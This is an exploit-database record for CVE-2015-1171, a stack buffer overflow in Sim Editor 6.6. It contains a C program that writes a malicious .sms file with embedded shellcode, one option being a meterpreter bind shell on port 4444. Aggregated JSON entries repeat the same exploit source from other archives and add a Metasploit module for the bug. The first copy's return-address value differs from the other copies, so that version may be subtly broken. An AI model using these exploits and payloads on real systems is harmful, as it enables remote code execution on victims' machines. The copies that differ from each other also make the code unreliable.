ID EDB-ID:35821
Type exploitdb
Reporter Osanda Malith
Modified 2015-01-16T00:00:00
Description
Sim Editor 6.6 - Stack Based Buffer Overflow. CVE-2015-1171. Local exploit for the Windows platform; the overflow is triggered when the application parses a crafted .sms file.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SIZE 65536
/*
* Title: Sim Editor v6.6 Stack Based Buffer Overflow
* Version: 6.6
* Tested on: Windows XP sp2 en, Windows 8 64-bit
* Date: 16-01-2015
* Author: Osanda Malith Jayathissa
* E-Mail: osanda[cat]unseen.is
* Website: OsandaMalith.wordpress.com
* CVE: CVE-2015-1171
*/
/*
 * First payload, stored as ASCII-hex text (two characters per byte).
 * main() writes this string verbatim into the output file with fputs(); the
 * generator itself never decodes or executes it.
 * It is listed as "MS Paint" in shell_names[0]. NOTE(review): presumably a
 * benign proof-of-execution payload that starts Paint; not verified here.
 */
const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
"3231561503561583eefce2a496ab54"
"46672c07cf821d15abc70ca9b88abc"
"42ec3e36263830ff8d1e7f00209ed3"
"c222622e17855be16ac49c1c849475"
"6a3709f22e8428d424b45251fa41e9"
"582bf96612d3712082e25632feadd3"
"81752c32d8761e7ab749ae77c98e09"
"68bce46915c73f13c142ddb382f505"
"454663ce4923e7884db224a36a3fcb"
"63fb7be8a7a7d891fe0d8eaee0ea6f"
"0b6b187b2d36777abf4d3e7cbf4d11"
"158ec6fe620f0dbb9d450fea3500da"
"ae5bb331ec6530b38d9128b688deee"
"2be14f9b4b566f8e262bff50d1a58b"
"92";
/*
 * Second payload, also stored as ASCII-hex text and written verbatim by
 * main(). The author's note below records how it was generated: an encoded
 * bind_tcp stager listening on TCP port 4444 (shell_info[1] prints the same
 * port). For defenders, an unexpected listener on that port owned by the
 * editor process is the observable this page itself points to.
 */
/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
"4a83effc315f11035f11e2ca04054e"
"34f5d62fbd10e77dd9515ab2aa3457"
"39feacec4fd6c345e500ed56cb8ca1"
"954d70b8c9ad49731caf8e6eeffd47"
"e44212ecb85e99be2ce77e744cc6d0"
"0317c8d3c02341cc050f1b67fdfb9a"
"a1cc04ad8d823a0100db7ba6fbae77"
"d486a843a65c3d560016e5b2b0fb73"
"30beb0f01ea347d514dfccd8fa6996"
"fede324c9f479f23a098479b04d26a"
"c831b9e23d7342f3290431c1f6bedd"
"697e18198d55dcb570561c9fb6024c"
"b71f2b07479ffe87170f5167c8ef01"
"0f02e07e2f2d2a179e098670e2ad38"
"dd6b4b50cd3dc3cd2f1adc6a4f4970"
"22c7c69ef4e8d7b45644705f2d8645"
"7e3283ee17a5597e55575dab0f97cb"
"5786c06355ff272ca62a3ce532952b"
"0ad215ac5cb815c4389845f14635fa"
"aad2b5ab1f74dd5179b242a9ac42bf"
"7c89c0c90af908";
/*
 * Parallel lookup tables indexed by the menu choice (0-based):
 *   shells[i]      - hex text of the payload written to the file
 *   shell_names[i] - label shown in the menu
 *   shell_info[i]  - extra hint printed after generation ("" for none)
 * SHELLS_COUNT is maintained by hand and must equal the number of entries in
 * each table; main() uses it as the upper bound when validating the choice.
 */
const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;
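/**
 * Print the numbered payload menu and read the user's choice from stdin.
 *
 * Entries are numbered from 0, matching the indexes of shell_names[].
 *
 * @return the index entered, or SHELLS_COUNT (an out-of-range value that the
 *         caller rejects) when stdin does not hold a non-negative integer.
 */
int menu() {
    /* "%i" stores through an int *, so the destination must be an int.
     * Passing the address of a size_t is a type mismatch (undefined
     * behaviour; on LP64 targets only half of the object is written). */
    int choice = 0;
    size_t i;

    puts("\b[?] Choose an Option: ");

    /* Cast to unsigned long for "%lu": printing a size_t with "%d" is
     * undefined behaviour, and "%zu" is not available on every C runtime. */
    for (i = 0; i < SHELLS_COUNT; i++) {
        printf("%lu. %s\n", (unsigned long)i, shell_names[i]);
    }

    /* Unparsable or negative input is reported as "no valid choice". */
    if (scanf("%i", &choice) != 1 || choice < 0) {
        return (int)SHELLS_COUNT;
    }
    return choice;
}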
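/**
 * Print the tool's ASCII-art banner and author credits to stdout.
 */
void banner() {
    /* Named "text" so the array does not shadow the enclosing function. */
    static const char text[] =
        " _____ _ _____ _ _ _ \n"
        "| __|_|_____ | __|_| |_| |_ ___ ___ \n"
        "|__ | | | | __| . | | _| . | _|\n"
        "|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
        "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
        "[~] Author: Osanda Malith Jayathissa\n"
        "[~] E-Mail: osanda[cat]unseen.is\n"
        "[~] Website: OsandaMalith.wordpress.com\n\n";

    /* sizeof counts the terminating NUL; subtract one so that no stray NUL
     * byte is written to stdout after the banner text. */
    fwrite(text, sizeof(char), sizeof(text) - 1, stdout);
}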
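/**
 * Fill dst with repetitions of a NUL-terminated pattern.
 *
 * Writes min(count * strlen(pattern), dst_size) bytes, cycling through the
 * pattern. No terminator is appended: a caller that later treats dst as a C
 * string must make sure a zero byte follows the filled region (main() relies
 * on calloc() and on buffers larger than the fill for this).
 *
 * @param dst       destination buffer of at least dst_size bytes
 * @param pattern   NUL-terminated pattern; an empty pattern writes nothing
 * @param count     number of repetitions requested
 * @param dst_size  capacity of dst in bytes
 */
void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
    size_t pattern_len = strlen(pattern);
    size_t total;
    size_t i;

    if (pattern_len == 0) {
        return;
    }

    /* count * pattern_len can wrap around for a large count, which would
     * silently shorten the fill. Compare by division first so the product is
     * only computed when it is known to fit in dst_size. */
    if (count > dst_size / pattern_len) {
        total = dst_size;
    } else {
        total = count * pattern_len;
    }

    for (i = 0; i < total; i++) {
        dst[i] = pattern[i % pattern_len];
    }
}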
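/**
 * Build the proof-of-concept file "exploit.sms" for CVE-2015-1171.
 *
 * The output is plain ASCII-hex text laid out as: 405 repetitions of "41"
 * (810 characters of filler), the 8-character value in ret, 16 repetitions
 * of "90", then the payload selected from the menu. That fixed layout is
 * also what a file-content signature for this generator's output can key on.
 *
 * @return 0 on success, 1 when writing the file fails; exits with status 1
 *         on invalid menu input, allocation failure or when the file cannot
 *         be opened.
 */
int main() {
    banner();
    int shell_type = menu();
    /* Check the sign explicitly instead of relying on the implicit
     * int -> size_t conversion to push negative values out of range. */
    if (shell_type < 0 || (size_t)shell_type >= SHELLS_COUNT) {
        printf("[-] Enter a valid input\n");
        exit (1);
    }

    /* calloc() zero-fills, so both buffers stay NUL-terminated after
     * patternfill(), which writes far fewer than SIZE bytes here. */
    char *buff = calloc (SIZE, sizeof(char));
    char *nops = calloc (SIZE, sizeof(char));
    if (!buff || !nops) exit (1);

    patternfill(buff, "41", 405, SIZE);
    patternfill(nops, "90", 16, SIZE);

    /* NOTE(review): presumably the hex text of the value that lands on the
     * saved return address; the page does not annotate this variant. */
    char ret[] = "B3804200";
    const char* filename = "exploit.sms";

    FILE *outfile = fopen(filename, "w");
    if (!outfile) {
        printf("%s\n","Could not open file");
        exit (1);
    }

    /* Track write failures instead of ignoring them, so a truncated file is
     * never reported as a success. */
    int failed = fputs(buff, outfile) == EOF
              || fputs(ret, outfile) == EOF
              || fputs(nops, outfile) == EOF
              || fputs(shells[shell_type], outfile) == EOF;

    /* fclose() flushes buffered data, so its result matters as well. */
    if (fclose(outfile) == EOF) failed = 1;

    free(buff);
    free(nops); /* the original released only buff */

    if (failed) {
        printf("[-] Could not write to: \"%s\"\n", filename);
        return 1;
    }

    printf("%s", shell_info[shell_type]);
    printf("[+] Successfully to written to: \"%s\"\n", filename);
    return 0;
}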
/*EOF*/
{"id": "EDB-ID:35821", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sim Editor 6.6 - Stack Based Buffer Overflow", "description": "Sim Editor 6.6 - Stack Based Buffer Overflow. CVE-2015-1171. Local exploit for windows platform", "published": "2015-01-16T00:00:00", "modified": "2015-01-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/35821/", "reporter": "Osanda Malith", "references": [], "cvelist": ["CVE-2015-1171"], "lastseen": "2016-02-04T02:05:35", "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-02-04T02:05:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1171"]}, {"type": "zdt", "idList": ["1337DAY-ID-23133"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/GSM_SIM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129992"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:274685E9B1AAB3DC857CCA19B27A95D9"]}], "modified": "2016-02-04T02:05:35", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://www.exploit-db.com/download/35821/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define SIZE 65536 \r\n\r\n/*\r\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\r\n * Version: 6.6\r\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\r\n * Date: 16-01-2015\r\n * Author: Osanda Malith Jayathissa\r\n * E-Mail: osanda[cat]unseen.is\r\n * Website: OsandaMalith.wordpress.com\r\n * CVE: CVE-2015-1171\r\n */\r\n\r\nconst char shell1[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \r\n \t\t\"3231561503561583eefce2a496ab54\" \r\n \t\t\"46672c07cf821d15abc70ca9b88abc\"\r\n \t\t\"42ec3e36263830ff8d1e7f00209ed3\"\r\n \t\t\"c222622e17855be16ac49c1c849475\"\r\n \t\t\"6a3709f22e8428d424b45251fa41e9\"\r\n \t\t\"582bf96612d3712082e25632feadd3\"\r\n \t\t\"81752c32d8761e7ab749ae77c98e09\"\r\n 
\t\t\"68bce46915c73f13c142ddb382f505\"\r\n \t\t\"454663ce4923e7884db224a36a3fcb\"\r\n \t\t\"63fb7be8a7a7d891fe0d8eaee0ea6f\"\r\n \t\t\"0b6b187b2d36777abf4d3e7cbf4d11\"\r\n \t\t\"158ec6fe620f0dbb9d450fea3500da\"\r\n \t\t\"ae5bb331ec6530b38d9128b688deee\"\r\n \t\t\"2be14f9b4b566f8e262bff50d1a58b\"\r\n \t\t\"92\"; \r\n\r\n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\r\nconst char shell2[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\r\n\t\t\"4a83effc315f11035f11e2ca04054e\"\r\n\t\t\"34f5d62fbd10e77dd9515ab2aa3457\"\r\n\t\t\"39feacec4fd6c345e500ed56cb8ca1\"\r\n\t\t\"954d70b8c9ad49731caf8e6eeffd47\"\r\n\t\t\"e44212ecb85e99be2ce77e744cc6d0\"\r\n\t\t\"0317c8d3c02341cc050f1b67fdfb9a\"\r\n\t\t\"a1cc04ad8d823a0100db7ba6fbae77\"\r\n\t\t\"d486a843a65c3d560016e5b2b0fb73\"\r\n\t\t\"30beb0f01ea347d514dfccd8fa6996\"\r\n\t\t\"fede324c9f479f23a098479b04d26a\"\r\n\t\t\"c831b9e23d7342f3290431c1f6bedd\"\r\n\t\t\"697e18198d55dcb570561c9fb6024c\"\r\n\t\t\"b71f2b07479ffe87170f5167c8ef01\"\r\n\t\t\"0f02e07e2f2d2a179e098670e2ad38\"\r\n\t\t\"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\r\n\t\t\"22c7c69ef4e8d7b45644705f2d8645\"\r\n\t\t\"7e3283ee17a5597e55575dab0f97cb\"\r\n\t\t\"5786c06355ff272ca62a3ce532952b\"\r\n\t\t\"0ad215ac5cb815c4389845f14635fa\"\r\n\t\t\"aad2b5ab1f74dd5179b242a9ac42bf\"\r\n\t\t\"7c89c0c90af908\";\r\n\r\nconst char *shells[] = { shell1, shell2 };\r\nconst char *shell_names[] = { \"MS Paint\", \"Bind Shell\" };\r\nconst char *shell_info[] = { \"\", \"[*] Connect on port 4444\\n\" };\r\nconst size_t SHELLS_COUNT = 2;\r\n\r\nint menu() {\r\n size_t shell_type = SHELLS_COUNT;\r\n puts(\"\\b[?] Choose an Option: \");\r\n size_t i;\r\n for (i = 0; i < SHELLS_COUNT; i++) printf(\"%d. %s\\n\", i, shell_names[i]);\r\n scanf(\"%i\", &shell_type);\r\n\treturn shell_type;\r\n}\r\n\r\nvoid banner() {\r\n static const char banner[] = \r\n \" _____ _ _____ _ _ _ \\n\"\r\n \"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\"\r\n \"|__ | | | | __| . | | _| . 
| _|\\n\"\r\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\r\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\r\n \"[~] Author: Osanda Malith Jayathissa\\n\"\r\n \"[~] E-Mail: osanda[cat]unseen.is\\n\"\r\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\";\r\n\r\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\r\n}\r\n\r\nvoid patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {\r\n size_t pattern_len = strlen(pattern);\r\n count *= pattern_len;\r\n if (count > dst_size) count = dst_size;\r\n if (pattern_len > dst_size) pattern_len = dst_size;\r\n\r\n size_t i, pI;\r\n for (i = 0, pI = 0; i < count ; i++, pI++) {\r\n if (pI == pattern_len) pI = 0;\r\n dst[i] = pattern[pI];\r\n }\r\n}\r\n\r\nint main() {\r\n banner();\r\n int shell_type = menu();\r\n if (shell_type >= SHELLS_COUNT) {\r\n printf(\"[-] Enter a valid input\\n\");\r\n exit (1);\r\n }\r\n\r\n char *buff = (char*) calloc (SIZE, sizeof(char));\r\n char *nops = (char*) calloc (SIZE, sizeof(char));\r\n if (!buff || !nops) exit (1);\r\n\r\n patternfill(buff, \"41\", 405, SIZE);\r\n patternfill(nops, \"90\", 16, SIZE);\r\n\r\n char ret[] = \"B3804200\";\r\n const char* filename = \"exploit.sms\";\r\n\r\n FILE *outfile = fopen(filename, \"w\");\r\n if (!outfile) {\r\n printf(\"%s\\n\",\"Could not open file\");\r\n exit (1);\r\n }\r\n\r\n fputs(buff, outfile);\r\n fputs(ret, outfile);\r\n fputs(nops, outfile);\r\n\r\n fputs(shells[shell_type], outfile);\r\n printf(\"%s\", shell_info[shell_type]);\r\n fclose(outfile);\r\n free(buff);\r\n printf(\"[+] Successfully to written to: \\\"%s\\\"\\n\", filename); \r\n return 0;\r\n}\r\n/*EOF*/", "osvdbidlist": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Stack-based buffer overflow in GSM SIM Utility (aka SIM Card Editor) 6.6 allows remote attackers to execute arbitrary code via a long entry in a .sms file.", "edition": 4, "cvss3": {}, "published": "2015-08-28T21:59:00", "title": "CVE-2015-1171", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1171"], "modified": "2015-08-31T17:45:00", "cpe": ["cpe:/a:gsm:sim_card_editor:6.6"], "id": "CVE-2015-1171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gsm:sim_card_editor:6.6:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-05T01:37:05", "edition": 2, "description": "Sim Editor version 6.6 stack-based buffer overflow exploit.", "published": "2015-01-17T00:00:00", "type": "zdt", "title": "Sim Editor 6.6 Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-17T00:00:00", "id": "1337DAY-ID-23133", "href": "https://0day.today/exploit/description/23133", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define SIZE 65536 \r\n\r\n/*\r\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\r\n * Version: 6.6\r\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\r\n * Date: 16-01-2015\r\n * Author: Osanda Malith Jayathissa\r\n * Website: OsandaMalith.wordpress.com\r\n */\r\n\r\n\r\nvoid add(int count, unsigned char* 
dest, unsigned char *src);\r\nint menu();\r\nvoid banner();\r\n\r\nint main()\r\n{\r\n banner();\r\n int i = menu();\r\n unsigned char *buff, *nops;\r\n FILE *outfile; \r\n \r\n buff = (unsigned char*) malloc (SIZE);\r\n nops = (unsigned char*) malloc (SIZE);\r\n if (!buff) exit (1);\r\n\r\n buff[0] = nops[0] = 0; \r\n add(405, buff, \"41\");\r\n add(16, nops, \"90\");\r\n\r\n unsigned char ret[] = \"D3804200\"; /* 0x4280D3 call esp */\r\n \r\n outfile = fopen(\"exploit.sms\", \"w\");\r\n\r\n if (!outfile) printf(\"%s\\n\",\"Could not open file\"); \r\n \r\n fputs(buff, outfile);\r\n fputs(ret, outfile);\r\n fputs(nops, outfile);\r\n \r\n if(i == 1) {\r\n unsigned char shell[] = \"ba516a43ddd9e9d97424f45e33c9b1\"\r\n \"3231561503561583eefce2a496ab54\"\r\n \"46672c07cf821d15abc70ca9b88abc\"\r\n \"42ec3e36263830ff8d1e7f00209ed3\"\r\n \"c222622e17855be16ac49c1c849475\"\r\n \"6a3709f22e8428d424b45251fa41e9\"\r\n \"582bf96612d3712082e25632feadd3\"\r\n \"81752c32d8761e7ab749ae77c98e09\"\r\n \"68bce46915c73f13c142ddb382f505\"\r\n \"454663ce4923e7884db224a36a3fcb\"\r\n \"63fb7be8a7a7d891fe0d8eaee0ea6f\"\r\n \"0b6b187b2d36777abf4d3e7cbf4d11\"\r\n \"158ec6fe620f0dbb9d450fea3500da\"\r\n \"ae5bb331ec6530b38d9128b688deee\"\r\n \"2be14f9b4b566f8e262bff50d1a58b\"\r\n \"92\"; fputs(shell, outfile);}\r\n\r\n else if(i == 2) {\r\n /* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\r\n unsigned char shell[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\r\n \"4a83effc315f11035f11e2ca04054e\"\r\n \"34f5d62fbd10e77dd9515ab2aa3457\"\r\n \"39feacec4fd6c345e500ed56cb8ca1\"\r\n \"954d70b8c9ad49731caf8e6eeffd47\"\r\n \"e44212ecb85e99be2ce77e744cc6d0\"\r\n \"0317c8d3c02341cc050f1b67fdfb9a\"\r\n \"a1cc04ad8d823a0100db7ba6fbae77\"\r\n \"d486a843a65c3d560016e5b2b0fb73\"\r\n \"30beb0f01ea347d514dfccd8fa6996\"\r\n \"fede324c9f479f23a098479b04d26a\"\r\n \"c831b9e23d7342f3290431c1f6bedd\"\r\n \"697e18198d55dcb570561c9fb6024c\"\r\n 
\"b71f2b07479ffe87170f5167c8ef01\"\r\n \"0f02e07e2f2d2a179e098670e2ad38\"\r\n \"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\r\n \"22c7c69ef4e8d7b45644705f2d8645\"\r\n \"7e3283ee17a5597e55575dab0f97cb\"\r\n \"5786c06355ff272ca62a3ce532952b\"\r\n \"0ad215ac5cb815c4389845f14635fa\"\r\n \"aad2b5ab1f74dd5179b242a9ac42bf\"\r\n \"7c89c0c90af908\";\r\n fputs(shell, outfile); \r\n puts(\"[*] Connect on port 4444\");}\r\n else { puts(\"[-] Enter a valid input\"); exit(-1); } \r\n\r\n fclose(outfile);\r\n free(buff);\r\n printf(\"%s\",\"[+] Successfully to written to \\\"exploit.sms\\\"\"); \r\n \r\n return 0;\r\n}\r\n\r\nvoid add(int count, unsigned char* dest, unsigned char *src) {\r\n int i;\r\n for (i=0; i<count; i++) strcat(dest, src); \r\n}\r\n\r\nint menu() {\r\n int i;\r\n puts(\"\\b[?] Choose an Option: \");\r\n puts(\"1. MS Paint\");\r\n puts(\"2. Bind Shell\");\r\n scanf(\"%i\", &i);\r\n return i;\r\n}\r\n\r\nvoid \r\nbanner() {\r\n static const char banner[] = \r\n \" _____ _ _____ _ _ _ \\n\"\r\n \"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\"\r\n \"|__ | | | | __| . | | _| . 
| _|\\n\"\r\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\r\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\r\n \"[~] Author: Osanda Malith Jayathissa\\n\"\r\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\"; \r\n \r\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\r\n}\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23133"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:51", "description": "", "published": "2015-01-16T00:00:00", "type": "packetstorm", "title": "Sim Editor 6.6 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-16T00:00:00", "id": "PACKETSTORM:129992", "href": "https://packetstormsecurity.com/files/129992/Sim-Editor-6.6-Buffer-Overflow.html", "sourceData": "`#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n \n#define SIZE 65536 \n \n/* \n* Title: Sim Editor v6.6 Stack Based Buffer Overflow \n* Version: 6.6 \n* Tested on: Windows XP sp2 en, Windows 8 64-bit \n* Date: 16-01-2015 \n* Author: Osanda Malith Jayathissa \n* E-Mail: osanda[cat]unseen.is \n* Website: OsandaMalith.wordpress.com \n*/ \n \n \nvoid add(int count, unsigned char* dest, unsigned char *src); \nint menu(); \nvoid banner(); \n \nint main() \n{ \nbanner(); \nint i = menu(); \nunsigned char *buff, *nops; \nFILE *outfile; \n \nbuff = (unsigned char*) malloc (SIZE); \nnops = (unsigned char*) malloc (SIZE); \nif (!buff) exit (1); \n \nbuff[0] = nops[0] = 0; \nadd(405, buff, \"41\"); \nadd(16, nops, \"90\"); \n \nunsigned char ret[] = \"D3804200\"; /* 0x4280D3 call esp */ \n \noutfile = fopen(\"exploit.sms\", \"w\"); \n \nif (!outfile) printf(\"%s\\n\",\"Could not open file\"); \n \nfputs(buff, outfile); \nfputs(ret, outfile); \nfputs(nops, outfile); \n \nif(i == 1) { \nunsigned char shell[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \n\"3231561503561583eefce2a496ab54\" 
\n\"46672c07cf821d15abc70ca9b88abc\" \n\"42ec3e36263830ff8d1e7f00209ed3\" \n\"c222622e17855be16ac49c1c849475\" \n\"6a3709f22e8428d424b45251fa41e9\" \n\"582bf96612d3712082e25632feadd3\" \n\"81752c32d8761e7ab749ae77c98e09\" \n\"68bce46915c73f13c142ddb382f505\" \n\"454663ce4923e7884db224a36a3fcb\" \n\"63fb7be8a7a7d891fe0d8eaee0ea6f\" \n\"0b6b187b2d36777abf4d3e7cbf4d11\" \n\"158ec6fe620f0dbb9d450fea3500da\" \n\"ae5bb331ec6530b38d9128b688deee\" \n\"2be14f9b4b566f8e262bff50d1a58b\" \n\"92\"; fputs(shell, outfile);} \n \nelse if(i == 2) { \n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */ \nunsigned char shell[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\" \n\"4a83effc315f11035f11e2ca04054e\" \n\"34f5d62fbd10e77dd9515ab2aa3457\" \n\"39feacec4fd6c345e500ed56cb8ca1\" \n\"954d70b8c9ad49731caf8e6eeffd47\" \n\"e44212ecb85e99be2ce77e744cc6d0\" \n\"0317c8d3c02341cc050f1b67fdfb9a\" \n\"a1cc04ad8d823a0100db7ba6fbae77\" \n\"d486a843a65c3d560016e5b2b0fb73\" \n\"30beb0f01ea347d514dfccd8fa6996\" \n\"fede324c9f479f23a098479b04d26a\" \n\"c831b9e23d7342f3290431c1f6bedd\" \n\"697e18198d55dcb570561c9fb6024c\" \n\"b71f2b07479ffe87170f5167c8ef01\" \n\"0f02e07e2f2d2a179e098670e2ad38\" \n\"dd6b4b50cd3dc3cd2f1adc6a4f4970\" \n\"22c7c69ef4e8d7b45644705f2d8645\" \n\"7e3283ee17a5597e55575dab0f97cb\" \n\"5786c06355ff272ca62a3ce532952b\" \n\"0ad215ac5cb815c4389845f14635fa\" \n\"aad2b5ab1f74dd5179b242a9ac42bf\" \n\"7c89c0c90af908\"; \nfputs(shell, outfile); \nputs(\"[*] Connect on port 4444\");} \nelse { puts(\"[-] Enter a valid input\"); exit(-1); } \n \nfclose(outfile); \nfree(buff); \nprintf(\"%s\",\"[+] Successfully to written to \\\"exploit.sms\\\"\"); \n \nreturn 0; \n} \n \nvoid add(int count, unsigned char* dest, unsigned char *src) { \nint i; \nfor (i=0; i<count; i++) strcat(dest, src); \n} \n \nint menu() { \nint i; \nputs(\"\\b[?] Choose an Option: \"); \nputs(\"1. MS Paint\"); \nputs(\"2. 
Bind Shell\"); \nscanf(\"%i\", &i); \nreturn i; \n} \n \nvoid \nbanner() { \nstatic const char banner[] = \n\" _____ _ _____ _ _ _ \\n\" \n\"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\" \n\"|__ | | | | __| . | | _| . | _|\\n\" \n\"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\" \n\"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\" \n\"[~] Author: Osanda Malith Jayathissa\\n\" \n\"[~] E-Mail: osanda[cat]unseen.is\\n\" \n\"[~] Website: OsandaMalith.wordpress.com\\n\\n\"; \n \nfwrite(banner, sizeof(char), sizeof(banner) , stdout); \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129992/simeditor-overflow.txt"}], "metasploit": [{"lastseen": "2020-08-27T01:32:05", "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer overflow occurs which allows an attacker to execute arbitrary code.\n", "published": "2012-04-14T05:12:48", "type": "metasploit", "title": "GSM SIM Editor 5.15 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2018-07-12T22:34:52", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/GSM_SIM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ruben Alejandro',\n 
'chap0 <contact.chap0[at]gmail.com>',\n 'Lincoln <lincoln[at]corelan.be>'\n ],\n 'References' =>\n [\n [ 'CVE', '2015-1171' ],\n [ 'OSVDB', '81161' ],\n [ 'EDB', '14258' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment #add esp, -3500\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3',\n {\n 'Ret' => 0x00405201, # call esp - SIMEditor.exe\n 'Offset' => 810\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 07 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),\n ])\n\n end\n\n def exploit\n buffer = rand_text_numeric(target['Offset'])\n buffer << [target.ret].pack('V').unpack(\"H*\")[0]\n buffer << make_nops(30).unpack(\"H*\")[0]\n buffer << payload.encoded.unpack(\"H*\")[0]\n\n file_create(buffer)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/gsm_sim.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSim Editor 6.6 - Local Stack Buffer Overflow", "edition": 1, "published": "2015-01-16T00:00:00", "title": "Sim Editor 6.6 - Local Stack Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-16T00:00:00", "id": 